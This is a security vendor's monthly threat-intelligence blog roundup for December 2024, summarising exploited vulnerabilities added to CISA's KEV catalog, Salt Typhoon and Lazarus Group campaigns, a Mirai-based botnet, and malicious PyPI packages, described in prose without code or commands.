Welcome to Picus Security's monthly cyber threat intelligence roundup!
Each month, our goal is to provide insights into the most recent and key malware attacks and vulnerability exploitation campaigns that could potentially affect your industry and region. Recognizing that a blog might not fully cater to your specific threat intelligence requirements, we're excited to introduce a new platform. This platform is crafted to deliver the most customized cyber threat intelligence, directly addressing your unique needs.
Our Picus CTI platform will enable you to identify threats targeting your region, understand your security posture in comparison to similar organizations, and receive easy-to-implement mitigation signatures from a variety of vendors. Additionally, it will offer a report that you can use to communicate with your peers or within your organization, ensuring that you are well-informed and prepared to address cyber threats effectively.
In this section, we will provide information on the latest vulnerabilities and exploits being targeted by adversaries in the wild, the affected products, and the available patches.
On December 19, 2024, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added CVE-2024-12356 to its Known Exploited Vulnerabilities (KEV) catalog. This critical command injection flaw, with a CVSS score of 9.8, affects BeyondTrust's Privileged Remote Access (PRA) and Remote Support (RS) products. It allows unauthenticated attackers to run arbitrary commands as the site user.
Figure 1. CISA added CVE-2024-12356 to its Known Exploited Vulnerabilities (KEV) catalog.
CISA cited evidence of active exploitation, urging users of self-hosted software to apply patches (BT24-10-ONPREM1/2) immediately. Cloud instances have already been updated.
This disclosure follows BeyondTrust's confirmation of a recent cyberattack, where threat actors exploited a stolen API key to reset passwords in Remote Support SaaS instances. Another medium-severity vulnerability, CVE-2024-12686, affecting administrative accounts, has also been patched in newer versions. BeyondTrust has notified affected customers.
On December 30, 2024, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added CVE-2024-3393 to its Known Exploited Vulnerabilities (KEV) catalog, citing active exploitation.
Figure 2. CISA added CVE-2024-3393 to its Known Exploited Vulnerabilities (KEV) catalog.
This high-severity denial-of-service (DoS) vulnerability affects Palo Alto Networks' PAN-OS software, specifically the DNS Security feature. An unauthenticated attacker can exploit this flaw by sending a specially crafted packet through the firewall's data plane, causing an unexpected reboot and potentially forcing the firewall into maintenance mode.
Palo Alto Networks has released patches to address this issue and recommends that affected users apply the updates promptly. CISA has set a remediation deadline of January 20, 2025, for federal agencies to secure their systems against this vulnerability
On December 17, 2024, CISA added CVE-2024-55956 to its Known Exploited Vulnerabilities (KEV) catalog. This critical vulnerability affects Cleo Harmony, VLTrader, and LexiCom, managed file transfer products. The flaw allows unauthenticated attackers to exploit unrestricted file upload capabilities, enabling the execution of arbitrary Bash or PowerShell commands on the host system by leveraging the default Autorun directory settings.
Figure 3. CISA added CVE-2024-55956 to its Known Exploited Vulnerabilities (KEV) catalog.
CISA highlighted the vulnerability's use in ransomware campaigns, emphasizing its exploitation risk. The agency has set a remediation deadline of January 7, 2025, for federal agencies to secure affected systems.
Cleo has released guidance and mitigations to address the issue. Users are urged to apply the recommended updates or discontinue use if mitigations are unavailable to reduce the risk of exploitation.
Here are the most active threat actors that have been observed in December in the wild.
On December 20, 2024, we published the tactics, techniques, and procedures (TTPs) used by the Salt Typhoon APT group to shed light on their sophisticated and stealthy cyber espionage campaigns, particularly targeting the telecommunications sector. Just last week, Salt Typhoon breached its ninth U.S. telecom firm, focusing on unclassified communications and metadata linked to U.S. officials. The White House disclosed this latest victim after federal guidance uncovered critical vulnerabilities exploited in the attack.
Simultaneously, the Federal Communications Commission (FCC) is addressing funding shortfalls for the "Rip and Replace" program to remove insecure Chinese telecom equipment [2]. Estimated at $4.98 billion, the program faces a $3.08 billion gap. Bipartisan support for a defense bill aims to secure $3 billion and additional funds through spectrum auctions. The initiative is critical for safeguarding U.S. networks and rural connectivity, addressing national security risks posed by Chinese infrastructure.
|
The U.S. is intensifying efforts to secure its telecommunications infrastructure amid escalating concerns over Chinese cyber espionage. TP-Link, a Chinese manufacturer holding approximately 65% of the U.S. home and small business router market [3], is under investigation for potential national security risks due to vulnerabilities in its devices that have been exploited in cyberattacks. |
On December 8, 2024, the U.S. Treasury Department fell victim to a cybersecurity breach orchestrated by Chinese state-sponsored Advanced Persistent Threat (APT) actors, identified as "Salt Typhoon" [4]. The breach exploited a compromised Remote Support SaaS platform provided by BeyondTrust, a privileged access management company. Attackers leveraged two zero-day vulnerabilities, CVE-2024-12356 and CVE-2024-12686, to reset passwords, gain privileged access, and steal sensitive documents remotely.
BeyondTrust detected the breach, revoked the stolen API key, and shut down all compromised instances. The FBI and CISA conducted an investigation, confirming no further unauthorized access. Salt Typhoon has also been linked to breaches in U.S. telecommunications, prompting CISA to recommend encrypted communication apps, while the U.S. considers banning China Telecom’s operations.
The Lazarus Group, linked to North Korea, has shifted its focus to the nuclear industry, targeting individuals within nuclear organizations. Previously associated with attacks on defense, aerospace, and cryptocurrency sectors, this marks an alarming escalation in their operations. Using fake job postings under “Operation DreamJob,” they deliver malicious files disguised as job assessments to infiltrate systems. Their arsenal includes sophisticated tools like Ranid Downloader and “CookiePlus,” a memory-resident, plugin-based malware that evades traditional security detection [1]. Recent campaigns also exploit zero-day vulnerabilities and deploy innovative malware like “RustyAttr” on macOS. These developments highlight the urgent need for strengthened cybersecurity in sensitive industries to counteract Lazarus Group's increasingly advanced tactics and persistent threat.
In December 2024, a variety of malware attacks were recorded, highlighting the persistent threat landscape. Below is a detailed list of the active malware incidents for the month.
On December 24, 2024, researchers reported a new Mirai-based botnet actively exploiting vulnerabilities in network video recorders (NVRs) and routers, including DigiEver DS-2105 Pro NVRs, TP-Link devices, and Teltonika RUT9XX routers. The campaign, identified as starting in October 2024, uses unpatched remote code execution (RCE) flaws and known vulnerabilities (CVE-2023-1389, CVE-2018-17532) to compromise devices [5].
The botnet exploits improper input validation in the DigiEver NVRs' /cgi-bin/cgi_main.cgi URI, enabling attackers to inject malicious commands. Compromised devices are enlisted into the botnet through malware binaries and cron jobs, enabling distributed denial-of-service (DDoS) attacks and propagation.
This botnet uses XOR and ChaCha20 encryption, targeting x86, ARM, and MIPS architectures, signaling evolved tactics among Mirai-based threats.
Fortinet FortiGuard Labs flagged two malicious Python packages, zebo and cometlogger, uploaded to the Python Package Index (PyPI). Together, these packages were downloaded 282 times—zebo 118 times and cometlogger 164 times—targeting users primarily in the U.S., China, Russia, and India. Both packages have since been removed from PyPI [6].
Zebo acted as spyware, leveraging obfuscation techniques to hide its command-and-control (C2) server. It logged keystrokes using the pynput library, captured hourly screenshots via ImageGrab, and exfiltrated data to ImgBB. Persistence was achieved by adding scripts to the Windows Startup folder.
Cometlogger was more advanced, siphoning credentials, cookies, and tokens from platforms like Discord, Steam, and TikTok. It also harvested system metadata, clipboard content, and network details, bypassed virtualized environments, and terminated browser processes to maximize its reach.
These incidents highlight the risks of interacting with unverified scripts from public repositories, emphasizing the need for careful scrutiny before execution.
[1] D. Ahmed, “Lazarus Group Targets Nuclear Industry with CookiePlus Malware,” Hackread - Latest Cybersecurity, Tech, Crypto & Hacking News, Dec. 23, 2024. Available: https://hackread.com/lazarus-group-nuclear-industry-cookieplus-malware/. [Accessed: Dec. 30, 2024]
[2] A. Khaitan, “US House to Vote on $3 Billion Funding for Removal of Chinese Telecom Equipment,” The Cyber Express, Dec. 24, 2024. Available: https://thecyberexpress.com/us-house-to-vote-on-rip-and-replace-program/. [Accessed: Dec. 30, 2024]
[3] “Website.” Available: https://www.wsj.com/politics/national-security/us-ban-china-router-tp-link-systems-7d7507e6
[4] L. Abrams, “US Treasury Department breached through remote support platform,” BleepingComputer, Dec. 30, 2024. Available: https://www.bleepingcomputer.com/news/security/us-treasury-department-breached-through-remote-support-platform/. [Accessed: Jan. 02, 2025]
[5] B. Toulas, “New botnet exploits vulnerabilities in NVRs, TP-Link routers,” BleepingComputer, Dec. 24, 2024. Available: https://www.bleepingcomputer.com/news/security/new-botnet-exploits-vulnerabilities-in-nvrs-tp-link-routers/. [Accessed: Jan. 02, 2025]
[6] The Hacker News, “Researchers Uncover PyPI Packages Stealing Keystrokes and Hijacking Social Accounts,” The Hacker News, Dec. 24, 2024. Available: https://thehackernews.com/2024/12/researchers-uncover-pypi-packages.html. [Accessed: Jan. 02, 2025]